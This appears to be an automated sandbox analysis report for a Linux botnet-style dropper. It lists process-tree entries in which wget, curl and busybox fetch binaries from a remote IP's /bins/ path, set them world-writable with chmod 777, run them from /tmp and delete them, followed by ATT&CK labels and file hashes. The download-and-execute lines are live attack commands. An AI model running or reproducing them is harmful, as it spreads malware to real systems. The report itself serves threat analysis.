/usr/bin/curlcurl -O http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1661
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1664
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1665
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1667
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:1669
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1670
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1671
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Writes file to tmp directory
PID:1672
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1673
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:1674
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:1675
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1676
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1677
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Writes file to tmp directory
PID:1678
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1679
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:1680
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:1681
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1682
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1683
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Writes file to tmp directory
PID:1684
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1685
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:1686
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:1687
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1688
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97